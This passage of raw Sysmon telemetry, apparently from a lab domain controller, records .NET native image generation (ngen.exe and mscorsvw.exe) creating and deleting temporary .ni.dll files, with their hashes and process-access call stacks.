\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023383Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:09.886{4DB9351A-A27D-60D3-AA05-00000000CF01}4764NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\TG1PAPLWD5\PresentationFramework-SystemDrawing.ni.dll.auxMD5=A02C0C258601D4B8EB3EDCC93DF92FF8,SHA256=3D42132C0F48D069E8199CBCBA66F222B02F59EE989CC48073EDB9FD12C2B6FE,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x800000000000000023382Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:09.886{4DB9351A-A27D-60D3-AA05-00000000CF01}4764NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\TG1PAPLWD5\PresentationFramework-SystemDrawing.ni.dllMD5=80943118284BBE6137CD73A454D59DD5,SHA256=5523D36F1D61BA105F8016022A2FC3FE4AED30727F9AB579A86D520DC46B8414,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023381Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:09.871{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A27D-60D3-AA05-00000000CF01}4764C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023380Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:09.839{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A27D-60D3-AA05-00000000CF01}4764C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023379Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:07:09.839{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A27D-60D3-AA05-00000000CF01}4764C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023378Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:09.839{4DB9351A-A27D-60D3-A905-00000000CF01}6740NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\TIK8PRE4FX\PresentationFramework-SystemData.ni.dll.auxMD5=1903BE5CC30FBE0E74D200EABD98F532,SHA256=BFE471B93304341BDB68459251C306D2F35900B05627D84C27A0BA880A297098,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x800000000000000023377Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:09.839{4DB9351A-A27D-60D3-A905-00000000CF01}6740NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\TIK8PRE4FX\PresentationFramework-SystemData.ni.dllMD5=081ED77008FAA28C44513061EE008444,SHA256=E35AB2F8FF1D3B3A213782F16B7F8044F13C1C97C39A58AA99943B863808EB42,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023376Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:09.824{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A27D-60D3-A905-00000000CF01}6740C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023375Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:09.808{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A27D-60D3-A905-00000000CF01}6740C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023374Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:07:09.808{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A27D-60D3-A905-00000000CF01}6740C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023373Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:09.793{4DB9351A-A27D-60D3-A805-00000000CF01}7144NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\20R7G1ETV5\PresentationFramework-SystemCore.ni.dll.auxMD5=50B8A406A7FF787A65EDFE81F99C1C55,SHA256=1EB483375431407468E78C83101F1D883E3B288E051767C34D667397DCFBE15A,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x800000000000000023372Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:09.793{4DB9351A-A27D-60D3-A805-00000000CF01}7144NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\20R7G1ETV5\PresentationFramework-SystemCore.ni.dllMD5=7FD4A41FC6F23A3499BD671051C93E4C,SHA256=4BEADF292DE8E5AD624FCCB06FA8438BD749CB32D359969683819E1F9CB0B525,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023371Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:09.761{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A27D-60D3-A805-00000000CF01}7144C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023370Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:09.746{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A27D-60D3-A805-00000000CF01}7144C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023369Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:07:09.746{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A27D-60D3-A805-00000000CF01}7144C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023368Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:09.746{4DB9351A-A27D-60D3-A705-00000000CF01}5004NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\IV2LVLP994\PresentationBuildTasks.ni.dll.auxMD5=310AB4DE2A79C89D81D62CFAA5D5B6CD,SHA256=DBCC845BE978671D2391107E4447B4CF7ADC39C0F838F461CB6BA5175BD7FD0E,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x800000000000000023367Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:09.746{4DB9351A-A27D-60D3-A705-00000000CF01}5004NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\IV2LVLP994\PresentationBuildTasks.ni.dllMD5=DCD86F6D7E39087F3B89B8C3270ECD2E,SHA256=FE7442C4FFA9A33D591E2876B498552B558636CC0B57908B88ACD471AC8566A0,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023366Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:09.576{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A27D-60D3-A705-00000000CF01}5004C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023365Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:09.542{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A27D-60D3-A705-00000000CF01}5004C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023364Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:07:09.542{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A27D-60D3-A705-00000000CF01}5004C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023363Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:09.542{4DB9351A-A27D-60D3-A605-00000000CF01}7092NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\8D8OZBAOS3\napinit.ni.dll.auxMD5=C557F8149C9A06303C9BBE65F24AEFE0,SHA256=41C7DC4DD9707C9D6BFDB73C1F7F92C28DA51B0BD493BB6D0B00C0DC61BB0F1D,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x800000000000000023362Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:09.542{4DB9351A-A27D-60D3-A605-00000000CF01}7092NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\8D8OZBAOS3\napinit.ni.dllMD5=175B75F2F8A695D803E8BF603B51796A,SHA256=DCAA8A9D9C8A68CCF57FDA02A2CE5EA539D326014801E85CCF45BE770DDC9D52,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023361Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:09.527{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A27D-60D3-A605-00000000CF01}7092C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023360Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:09.496{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A27D-60D3-A605-00000000CF01}7092C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023359Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:07:09.496{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A27D-60D3-A605-00000000CF01}7092C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023358Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:09.496{4DB9351A-A27D-60D3-A505-00000000CF01}6340NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\FHZTR04TH1\napcrypt.ni.dll.auxMD5=E8D75F5590AE7C163A2740DF4DC1E76D,SHA256=7B6989BED263AF1D9310510C60E4287BB2941035AEAE1343628845173B9FEDF3,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x800000000000000023357Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:09.496{4DB9351A-A27D-60D3-A505-00000000CF01}6340NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\FHZTR04TH1\napcrypt.ni.dllMD5=C8731BE3381CC7F25BA891FECEABB9BC,SHA256=730E34EF4C4ADD843B421910F9A02F993104C806BC3523712C1D9BA23973126C,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023356Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:09.480{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A27D-60D3-A505-00000000CF01}6340C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023355Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:09.464{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A27D-60D3-A505-00000000CF01}6340C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023354Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:07:09.464{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A27D-60D3-A505-00000000CF01}6340C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C: